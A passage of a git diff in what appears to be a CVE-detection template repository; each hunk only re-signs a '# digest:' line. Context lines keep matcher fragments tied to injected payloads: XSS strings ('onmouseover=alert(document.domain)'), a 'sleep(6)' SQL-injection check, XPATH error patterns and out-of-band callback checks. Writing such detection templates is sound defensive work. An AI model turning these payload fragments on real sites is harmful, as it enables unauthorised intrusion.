4b0a00483046022100d24028d90f855321d541394c206888ac3de32ddc95fd192f2cea84c3ce106573022100b06dfd2c7fe33e022d5bc25a563682c01a13c1ca7e839fe8ebbf28f79406baa1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0236.yaml b/http/cves/2023/CVE-2023-0236.yaml index 883795acfc..ac6023e384 100644 --- a/http/cves/2023/CVE-2023-0236.yaml +++ b/http/cves/2023/CVE-2023-0236.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "Instructor Registration")' condition: and -# digest: 4b0a00483046022100daa47e8a4a0788475b79a18cbc1ad7c5a77b7eb596d483b673abb302bc1652560221008be0757737078d080d1fae62c765719987415565af3c11d18506449909548690:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210086a85f95b8839d00d4ae004b419cb7a973cfadfb4410aad14e860aaebafec71302201091a4ba927a99a9ce115982e429f56111aa729bc688301748c19fd489652273:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0297.yaml b/http/cves/2023/CVE-2023-0297.yaml index 43fd326232..26cafe16f6 100644 --- a/http/cves/2023/CVE-2023-0297.yaml +++ b/http/cves/2023/CVE-2023-0297.yaml @@ -60,4 +60,4 @@ http: part: interactsh_protocol words: - "dns" -# digest: 4b0a00483046022100e04d22e3c9f98a73a04f2df0ebc25a6f86b2441aab53abde2822f6c4307266d4022100f3582924ba72e0f4076d042a65eb28d5f6ab0a70b9094581c0591d602a8e30f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220400e7b76f4f4cf9870346fb29d8e654df2167790ed2d76301b8ba004db9ee11e022100be4e3edb0589d0c55d0484bf513363e3876baa53bd6c2a2fef65f79df30ae768:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0334.yaml b/http/cves/2023/CVE-2023-0334.yaml index d43bf8dfa8..0fd37658f8 100644 --- a/http/cves/2023/CVE-2023-0334.yaml +++ b/http/cves/2023/CVE-2023-0334.yaml @@ -41,4 +41,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "shortpixel") && contains(body, "")' condition: and -# digest: 4a0a0047304502203508d5e191b0f01786fb58c69f6f58561b03fb802660cf3d9897bc32149c97b6022100c2759cc2f8e2cd0d0da129288ab33ee23dadc2e8c4ee0e78c6d5d4591758c2f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f9fa2b52bf2536bca562c0635d3f1788a120768830a3f226cb798cd85b4ebae1022100f8a848371eb718d287123a0c59cecb3cf4a024ab502b1b0439593c39a5ff1cb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0448.yaml b/http/cves/2023/CVE-2023-0448.yaml index b06b0d9466..561521dd45 100644 --- a/http/cves/2023/CVE-2023-0448.yaml +++ b/http/cves/2023/CVE-2023-0448.yaml @@ -46,4 +46,4 @@ http: - 'contains(body, ">")' - 'contains(body, "params\":{\"action")' condition: and -# digest: 4b0a004830460221008d8aa32338bfb7f81e502ff42a03d08e31ef3ea396eb9a3ff9fa31026dd6ff740221009f8879ac6a1bdfdfd7cf3db48ff44c8bf0a5022ef91619d357685c2211a6d58a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a13cd09bfd85cb1a4ee7a086824969d7b60e3a5f2d84190ce1f8084e3ed87810022100cfc834559b931faa279433809826cbadfa81aad7dd4882fb3ccc8d83fd7ff237:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0514.yaml b/http/cves/2023/CVE-2023-0514.yaml index a6397dc7fa..ae70c8708f 100644 --- a/http/cves/2023/CVE-2023-0514.yaml +++ b/http/cves/2023/CVE-2023-0514.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "Member Database")' condition: and -# digest: 490a0046304402206f0422b248523ed3922d1453f05cf58d5f60c4ae304a8a6f2ecaff8009992d6b022056ea05f2741c237996bb80986bc2a280c311a1d9802f2ae9e9e5a71038db2be2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210090145a1d8a3b1ae8915299f67e45e0abb4418479ea20c08f4b7b58a17ca2af1902202d248fea2d26ef5d16477d20515ff55c93dab15e7dd7e33e38cc0d9cb35c93b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0527.yaml b/http/cves/2023/CVE-2023-0527.yaml index bb322b34f6..d6736644a9 100644 --- a/http/cves/2023/CVE-2023-0527.yaml +++ b/http/cves/2023/CVE-2023-0527.yaml @@ -46,4 +46,4 @@ http: - 'contains(body, "")' - 'contains(body, "Online Security Gauard Hiring System |Search Request")' condition: and -# digest: 4a0a00473045022100a43c27d627e8467ae87028412d582a54888b15b6d467bebb762ba204dbf65113022041c5d7946de5f33a3cbcee2c5c5376022e68453311691ea38e97baf127489725:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a343a32d329fb055c3eb661448e738379aff505ebe733d9e4b567f04dc5ca39a02201abb22ff3473d17db6dd210c33705f9fadee48d87fe5298dbad7c057a203e6e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0552.yaml b/http/cves/2023/CVE-2023-0552.yaml index b8a8f23572..ae4b45d10f 100644 --- a/http/cves/2023/CVE-2023-0552.yaml +++ b/http/cves/2023/CVE-2023-0552.yaml @@ -38,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$' -# digest: 4a0a004730450221009a43102975ca9cbbf8f2d57a5f3a53496de4ac374bde3bcf0ee22cd7990f8c820220148b4d4d1ca0ef65545d30ac6b9ae93ed2bbf928f8b3e981e19fc44b2a19c151:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203fe4df23c800718a8fc1b6aa75d17660ea5e3ecbf9bad91b33e15202a629463302202dcd39f417726bda05249f40f18a86b6a265cf0b14853256096d0893e8f786d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0562.yaml b/http/cves/2023/CVE-2023-0562.yaml index db415f56ad..ff557aadeb 100644 --- a/http/cves/2023/CVE-2023-0562.yaml +++ b/http/cves/2023/CVE-2023-0562.yaml @@ -47,4 +47,4 @@ http: - 'contains(body, "admin")' - 'contains(body, "BLMS | Dashboard")' condition: and -# digest: 4a0a00473045022100a83e4f426dee5b966ea13ce961702c3c9f146fb91cc171084ddc7b338df6982802205438c91226989896a74aeeae0b041231e409cadbe2eda2301ea0bb1d7eeab9ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eda3ead7dacde7dddd07bd8a1950d0fefc1b990044bde699bef31f4613c10192022052a24fd4127e20ddd0fabd69f9d7caf93a82ea337a5259ac2d1c24c44e023a8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0600.yaml b/http/cves/2023/CVE-2023-0600.yaml index 47c6487754..9d026d71d6 100644 --- a/http/cves/2023/CVE-2023-0600.yaml +++ b/http/cves/2023/CVE-2023-0600.yaml @@ -60,4 +60,4 @@ http: - 'status_code == 200' - 'contains(body, "sleep(6)")' condition: and -# digest: 490a004630440220261580cf7a6acf3bd48c82b17b9befe18160f0f95f445a299f518bc9a852492902200976177287be838bdccc1077745ec0a5fb67ea2cbf3048964a74b82748fadfed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202861c8403d3eb479bb492712f393950224b00196285a91cabc26cfc6df23dd99022100f972e8f4e92362995d0226f6b20acfc5a5f63de38899b1d6a1df02dc0d6349db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0602.yaml b/http/cves/2023/CVE-2023-0602.yaml index b4d0cd6150..20240647fe 100644 --- a/http/cves/2023/CVE-2023-0602.yaml +++ b/http/cves/2023/CVE-2023-0602.yaml @@ -45,4 +45,4 @@ http: - 'contains(header_2, "text/html")' - 'contains_all(body_2, "", "twittee")' condition: and -# digest: 4b0a00483046022100e5fce08d81164199e113a5e8a44e47e3a80de938ed5284232742f6ec12745cff022100af62d819e8c9fe644c67d22c4e6cb543bfce8719a6d6046b423facdeed2ee8e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022055eff03f7b91ce24bf430d5fbf23f913a168a32bf5a1496e975dfa16439e1f190220056c2da3cdd58f9d0da845fcbe25f11a4628f92ba076c2e00f56ed0331005d59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0630.yaml b/http/cves/2023/CVE-2023-0630.yaml index c9a9a6e5fd..3299a170aa 100644 --- a/http/cves/2023/CVE-2023-0630.yaml +++ b/http/cves/2023/CVE-2023-0630.yaml @@ -54,4 +54,4 @@ http: - 'contains(content_type_2, "application/json")' - 'contains(body_2, "audioShortcodeLibrary")' condition: and -# digest: 4a0a0047304502205d8cfa34716682707fd04b70f6767f9548456638742f3be97df93a370889381f022100f4b24efcacacbf6795ea4cc37fce07c2968f568e61300a6be831a398ff3fd492:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ee61f22a1918e6a9198b81991818592c4981a6fabd8b5a895193a6dd70cc1528022100ec8b1623dc9206a446c7ae05f336e019ef9b53de9773c86a6a21cf25835b2d04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0669.yaml b/http/cves/2023/CVE-2023-0669.yaml index c12d836bf2..5a23d85203 100644 --- a/http/cves/2023/CVE-2023-0669.yaml +++ b/http/cves/2023/CVE-2023-0669.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 500 -# digest: 4a0a004730450220207c735e2469d6bf2af5178c7053b234490ccaa8584d568bb036adcc0ca0e16c022100dd5efb4ae7b7db86c7b6caee1806c494eeb8c6ce825ea4d94c449c4a09f4ff96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e4c92d573b28770ca839e68e2b68d7a30ec2af40ff4abc64d9f4629681c70379022100c28548dd16e73ddb8f66ab1af4f4573c78c0681294fefe2136fcaa8f9b9ef758:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0678.yaml b/http/cves/2023/CVE-2023-0678.yaml index a3ecfa1573..e9fa8facd9 100644 --- a/http/cves/2023/CVE-2023-0678.yaml +++ b/http/cves/2023/CVE-2023-0678.yaml @@ -34,4 +34,4 @@ http: - 'contains_all(body, "Array", "[subnet]", "[description]")' - 'status_code == 200' condition: and -# digest: 4a0a00473045022037ac3124b44bce6f30d38786c1118c28fe1a677e07b4d42f8793cdda1dccb40d022100e26f55f37eebb523a6dd288acef08e07981cd1298c176c6412d73f6be509d116:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f9d5744f5ea518c0c15f7e8ae02484ba248121b2bb5f85fe63f693fc4a5968a602206e2279d5e1a12053e341f2e6f08fc0e01edee04ee85bd9a2a558592614c9a52c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0900.yaml b/http/cves/2023/CVE-2023-0900.yaml index 067525648f..f57e933394 100644 --- a/http/cves/2023/CVE-2023-0900.yaml +++ b/http/cves/2023/CVE-2023-0900.yaml @@ -66,4 +66,4 @@ http: regex: - '_wpnonce=([0-9a-z]+)">Log Out' internal: true -# digest: 490a0046304402205451db383786918c1f14b6751c0ffaeb263600bab8cc76dc938cf3e1847531b902203c9a566e2f17d7cd2501e5dad53491de15f0dcbe0b569a5be1a41ca489e8b894:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bf8e9a00df0f8377907f2df5438b99e4a3d36b85f2938b25de0dc3ae5fa9abab022100f49f5afc99d134805292ba1c0c1f07dc7da7076b0bf9292863ecccbb80e562f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0942.yaml b/http/cves/2023/CVE-2023-0942.yaml index 2022d1e92d..2cb5dfbf36 100644 --- a/http/cves/2023/CVE-2023-0942.yaml +++ b/http/cves/2023/CVE-2023-0942.yaml @@ -49,4 +49,4 @@ http: - 'status_code_2 == 200' - 'contains(body_2, "") && contains(body_2, "woocommerce-for-japan")' condition: and -# digest: 4a0a0047304502205a6154be3977335b0b6a8edafe8ebf0cdc8be8592b0dde724b514055ced4fc0e022100935f1df2f35df2ff8160527c45087dc5c1a387351a1dcc8ea9fea63d30041d53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204678900739d421af66218eedfb37d3b4faaec14cc9fab315b639805bbe64fb4602203c9b3d648bcf22dbded8fe022042b2eda178e4baee5ae3b293cc8ca90ae43cc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0947.yaml b/http/cves/2023/CVE-2023-0947.yaml index 1562c76f9c..a769e1f62d 100644 --- a/http/cves/2023/CVE-2023-0947.yaml +++ b/http/cves/2023/CVE-2023-0947.yaml @@ -40,4 +40,4 @@ http: - 'status_code == 200' - 'contains(body, "Index of /fp-content")' condition: and -# digest: 4a0a00473045022100a6fad072aa7b7a33eeb7febfa517c81a87cdd0458f78e659f4436d97e14cda8c02201122c5d07ec27092761f1e6d267c54e6cd56b9d6df20fe247ee60f0783601bd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206ac68e76b7d1b80590fce76a7c334d02683e8f5685f3f00ca00d482a705fca06022100a542a7ce222beaa5b850215fc76bce92f218fda6a243cf87ddd630934f1c2d8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0948.yaml b/http/cves/2023/CVE-2023-0948.yaml index 1066b76c09..b2e40f87fb 100644 --- a/http/cves/2023/CVE-2023-0948.yaml +++ b/http/cves/2023/CVE-2023-0948.yaml @@ -49,4 +49,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "peachpay")' condition: and -# digest: 4a0a0047304502207489300b27fc604ebc086d2dcf53a066f713bf6e155fc3d7e796b5d5e7073f41022100d763b61ecc36c48a60e65fcac863f65fb4d354916e78aef5854c9720707c38f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c1cae439df45cc5bf67cfc667a3d7e01b5f8cc44e84fedccebcb6e48d61a6f4c02202ba183314bba02b3e24a222a89825f4d79dd91838f02f1e7742ff2f7b1809bcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0968.yaml b/http/cves/2023/CVE-2023-0968.yaml index f011262b94..609294ad2e 100644 --- a/http/cves/2023/CVE-2023-0968.yaml +++ b/http/cves/2023/CVE-2023-0968.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, "/onmouseover=alert(document.domain)//")' - 'contains(body_2, "Watu Quizzes")' condition: and -# digest: 490a004630440220101a9d9c53b24a7571530b23ae247be38f0e4664af24681277fdacfd89e411ce02206695c9ba4925e33fea75684fa188a7bbe650cbebaa6750343535fa6fa8939a43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008a17dec616c53559bea67a8cd4735a918b0217d5fd3ab3177fe5a9654a563107022100dc1d6eb7ac19aab44743cb8a942958603e5520ae7675897d1a3e156197cb02b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1020.yaml b/http/cves/2023/CVE-2023-1020.yaml index ba432b2d8a..d024d70cb2 100644 --- a/http/cves/2023/CVE-2023-1020.yaml +++ b/http/cves/2023/CVE-2023-1020.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fac5c85ebe071ae5ef03e6745f869794a516d4dd1a7fd22f58ec3d490039c84c022100cafea571a15f3be63d57818f9c9386f1433fe77561b33395aeb30cde8b682100:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f60074afcba18d8329031644df56f875059e5aefdb617ace5a99a590058c3559022100ba696ebc5b28984c6d315cdb803ba38a639adbbc9a02e39f35bd051ca3dc72ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1080.yaml b/http/cves/2023/CVE-2023-1080.yaml index 5308f6b506..dec84e5f9e 100644 --- a/http/cves/2023/CVE-2023-1080.yaml +++ b/http/cves/2023/CVE-2023-1080.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, "/ onmouseover=alert(document.domain);//")' - 'contains(body_2, "GN Publisher")' condition: and -# digest: 4b0a004830460221009e1ffc42fadc2223a2bde2cfca3d21b2ccb40f02c1ccf27a1ded4325da215dfb022100fd1a246c50613256dcd59279b3f0ea4fcde05ce171adfeabd1d5068a35986ed9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202b609b4ae1aa40731a8add9877fadcbf435ea7adc7aa46ba176951fe72d3d805022003ef448a0c5dbea69b1438ad3eb0dc481a9eb42ce5eeaf882e68c97f64112fe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1177.yaml b/http/cves/2023/CVE-2023-1177.yaml index 6030f84805..6ba483e3de 100644 --- a/http/cves/2023/CVE-2023-1177.yaml +++ b/http/cves/2023/CVE-2023-1177.yaml @@ -70,4 +70,4 @@ http: - '"version": "([0-9.]+)",' internal: true part: body -# digest: 4b0a00483046022100d755ca22bd1d15b3e2037d22374fbe60d7b1db9c35cc6a4cad95e1b57c88d42a022100c8c05dd9d1b11648b906d574c3f74255eabdd64d0283c45bb8dac0ee7c66c3cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022056f9bdb16ccb00b5dd4fa12e9eba4ca7d7e939c843f667b4581165ca69a847f202200e0f376f456a995535eaf668ed23e5d6128f81e7cde97308346a4aea04bef498:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1263.yaml b/http/cves/2023/CVE-2023-1263.yaml index 25f19d2e58..814427cadc 100644 --- a/http/cves/2023/CVE-2023-1263.yaml +++ b/http/cves/2023/CVE-2023-1263.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022011e5f903b0a93f9e3c06ec147cc8c3f99a9d83b16945cc273a867de1c81ea74e0221009f399c551bcf521294a213c1b973399eb02bea51059fdf559b11acf56aff52ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220094fcdf2f6773c8f431e3472cbc4ce5762d7fb4ecfa31abf8da8b6fb4d75b76a02206c444bd2a1756955ffe195a995bd222948a0ea6d6e9b2441791be9c3f4790a4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1362.yaml b/http/cves/2023/CVE-2023-1362.yaml index e7c3986772..32a25945e7 100644 --- a/http/cves/2023/CVE-2023-1362.yaml +++ b/http/cves/2023/CVE-2023-1362.yaml @@ -42,4 +42,4 @@ http: - "!regex('X-Frame-Options', header)" - "contains(body, 'BUMSys
')" condition: and -# digest: 4b0a00483046022100db736e1f7e3b60b5cdc1776b06c2485456e5878e8fb3742146e4e593eeaa3f95022100f0fbea2cbfdb563686635b04f3c66d63dc0874d5c884e91e104af6118f8f9deb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008a79a4ec7e3c4d6be37f81281c4648dae38737c877092a9d257e5b92b0924c4c02200a020bcf923115f3cf0bf8cd32bfee8d459ab0cbef61231a5e381ba9cafca072:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1408.yaml b/http/cves/2023/CVE-2023-1408.yaml index 5b16ee7d47..d62b8d443c 100644 --- a/http/cves/2023/CVE-2023-1408.yaml +++ b/http/cves/2023/CVE-2023-1408.yaml @@ -50,4 +50,4 @@ http: - 'status_code_2 == 200' - 'contains_all(body_2, "Edit Video","Youtube")' condition: and -# digest: 490a004630440220557189f3aeda3c74e23c7c2eafca9a9ffd0d874f4c21f4998f0fa7da5b3d34390220535b42e7ed0a6ca565fbab863cb242ca58ab68d291a3470b7e8c5d54ebf0de30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b5d3d69f571fab56226ee2efc6bf4ad52536adaebc6bc8da1207f7a70d57015a02203f78d2503ccf987c7dc76ae921a1e764d243158a2e833517f6d4585f4ff3d0e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1454.yaml b/http/cves/2023/CVE-2023-1454.yaml index 13e02aa8e0..0188d9aaf2 100644 --- a/http/cves/2023/CVE-2023-1454.yaml +++ b/http/cves/2023/CVE-2023-1454.yaml @@ -68,4 +68,4 @@ http: - "XPATH syntax error: '([a-z- @%]+)'" - "XPATH syntax error: '([a-z@%0-9.]+)'" part: body -# digest: 490a0046304402201617c97220bd0ac605e36efc6731e6e680ab819a2d613804423de883aba8d1eb0220562bcbd34db0c1ce70cd835193e6819e76e7cef2925feda6621420165482860b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ae1a4096256e2a1c9542f440f000332fa0ba7ca07eb5425181f24e1083029ef4022068683c471f87d8e1566ef6a368e833b5e5caa8d0579c03aa83e07c89614345ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1496.yaml b/http/cves/2023/CVE-2023-1496.yaml index 85951132a0..ca70240103 100644 --- a/http/cves/2023/CVE-2023-1496.yaml +++ b/http/cves/2023/CVE-2023-1496.yaml @@ -44,4 +44,4 @@ http: - type: dsl dsl: - content_security_policy -# digest: 4a0a0047304502202ad789f0ac262a3012d88a82fabcb0495918466b6945c80a40a9cf0f17501756022100fcd6b4965a63afc6ed0a5933664366f832ca12cc04bd2e4809dbd1fec88dc51b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022030093375e39a5d0e186176cbda26b99b4f2d9b98da7caf82f840983068846982022050711347eca3508bdbc51f4e2785386976f7c0c935a3a2a1f0651f6806dc8019:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1546.yaml b/http/cves/2023/CVE-2023-1546.yaml index 1c2ba9143e..9e6b35eb69 100644 --- a/http/cves/2023/CVE-2023-1546.yaml +++ b/http/cves/2023/CVE-2023-1546.yaml @@ -48,4 +48,4 @@ http: - 'contains(body_2, "scriptalert(/XSS/)/script")' - 'contains(body_2, "mycryptocheckout")' condition: and -# digest: 490a00463044022018d8d859d1510e71d41e4dcab2713a5820907e67c0445dd0ecdb4500c0fa6b730220327729b1610301143ba6cbd8037ecece03bc57e6fcd4ce7118478ec6102d864a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a5543a3c7f138537869158794cc19d7e7cf4177118b7829488b5a952c0c3b2bc02204e68af118f9d1ace75a15952a8bdb5cfb5aaeb7443589b3cbaf1e2528b5f8821:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1671.yaml b/http/cves/2023/CVE-2023-1671.yaml index c619736526..e49467e9c9 100644 --- a/http/cves/2023/CVE-2023-1671.yaml +++ b/http/cves/2023/CVE-2023-1671.yaml @@ -54,4 +54,4 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 4a0a00473045022100ae0e465ec75fd0a4861424e3aad7f02640cf6221038527efafe82c6742e6737002206c97e80f7b304f7c6b2617847d8a6c3bc6133ac27161b8921c0781f00317ca0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220072b65d71510b1634861b941e61475482be1ba0838781257678f74617cbb62b702202d1edc88fa42eea9bfacbaee660087313a77e0dfb93cd9d2198a1198cfc173d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1698.yaml b/http/cves/2023/CVE-2023-1698.yaml index 01496b488e..ce1af8b645 100644 --- a/http/cves/2023/CVE-2023-1698.yaml +++ b/http/cves/2023/CVE-2023-1698.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b407d13bb092bfd293626f93b9765b760fc504f78be29190689950f60041a7bf02200e23d21826874028db946e7c4a4af5e0b05de0bed54232eb4b63c39eb70fe3aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009328b8cfdfa07c19005e8c785f33971030b1e69f80497f0678af09446cff35b7022044197fa263ddc6abed937608a3484fad2d8e6dc30f37abe7d0c5b1d5b669fae9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1719.yaml b/http/cves/2023/CVE-2023-1719.yaml index f46619f25a..268e7d9d18 100644 --- a/http/cves/2023/CVE-2023-1719.yaml +++ b/http/cves/2023/CVE-2023-1719.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ee017b54c73c0f61455fa03bda991d45a439666dd9865e87ae61054c61089562022036a61ac1c74ee4bdc735c1e9d6eedb6e2c5cb5f2df88ed4c4e65875d66e4f091:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220038ee01fa9935d03a32a3a7470cca7c217ac7b63f63a30c0af062298fc4dfb2602206e8e49ba9bb685d8b9d999dae8c61a2f6b2ebc1eaddaa14d1efea7fc06364779:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1730.yaml b/http/cves/2023/CVE-2023-1730.yaml index f48e1c9796..fcc7040049 100644 --- a/http/cves/2023/CVE-2023-1730.yaml +++ b/http/cves/2023/CVE-2023-1730.yaml @@ -44,4 +44,4 @@ http: - 'status_code == 200' - 'contains(body, "supportcandy")' condition: and -# digest: 4a0a00473045022100b8f43200f81783f187365c589653ad29a2050ba46a41782681ecc57fbfed6942022017518deb0c7150bec65b058cc0687e118acd14f0c54396df0e503dfb9ccdf33a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a7f2d28c6bf94595593025ec52e5895af660c64274a689070f34e319f39889ec022073bba0fe01da7629b66e32798c46291975535b829e30ced65d1cbbe3c4e26711:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1780.yaml b/http/cves/2023/CVE-2023-1780.yaml index 588fb35ccd..9297459d82 100644 --- a/http/cves/2023/CVE-2023-1780.yaml +++ b/http/cves/2023/CVE-2023-1780.yaml @@ -49,4 +49,4 @@ http: - 'contains(body_2, "re not allowed to view")' - 'contains(body_2, "")' condition: and -# digest: 4a0a00473045022037fd184a30baa4bf9c5bead97935ec384efbce6d629f36e79fdc4a6f96c2a5d0022100fdeb0ca8f655e4f1856990096615ff0c35961dd2dea9984283364c1c0c9cc6ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022008f87555ca75fc4939314686cecddcc71066602938b9bbf9da682d91e537f6d5022050d03ebc2a2b1a35203a8af4d8add66270d5994ead2582668875a3e8b2184673:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1835.yaml b/http/cves/2023/CVE-2023-1835.yaml index fa2ae0923a..c61f3dbeda 100644 --- a/http/cves/2023/CVE-2023-1835.yaml +++ b/http/cves/2023/CVE-2023-1835.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "Ninja Forms")' condition: and -# digest: 4b0a00483046022100e5e7a1e57dcb12a58b14088fffc8b645c336e75e181bb9e86ad3afa2cd124f16022100b7094b86bf5ee74099a6da69ea87a76394fbb02765149b058c67daca7ac66a1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022045f3a95c176c2addf7bb4c7bb971f457459a9df823820444024086732be71dbd0221008825780a2ce7eaa87319fb76035339a15ec592a9d62c12f41f8a8b6be8776d3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1880.yaml b/http/cves/2023/CVE-2023-1880.yaml index 7fb02e0450..7144b5649d 100644 --- a/http/cves/2023/CVE-2023-1880.yaml +++ b/http/cves/2023/CVE-2023-1880.yaml @@ -40,4 +40,4 @@ http: - 'contains(body, "phpmyfaq") && contains(body, "")' - 'contains(content_type, "text/html")' condition: and -# digest: 490a0046304402205b480a371ae035c47014eec72651c9396eb2f4cbb16cef0e087536bdb0401ade02203534bd6903549f0f9c3753092efb1d6cdf4adda76ba68f6fd7ab8557a659d271:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207503b527466102b06d1c2f395825c0aca20799fada79e374c81107610a59fd5b0221009a08b4c9cc566145837f677b18194b727a2de191f337726664826007510b98ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-1890.yaml b/http/cves/2023/CVE-2023-1890.yaml index 0f60b833ad..7820aac1f1 100644 --- a/http/cves/2023/CVE-2023-1890.yaml +++ b/http/cves/2023/CVE-2023-1890.yaml @@ -49,4 +49,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "tablesome")' condition: and -# digest: 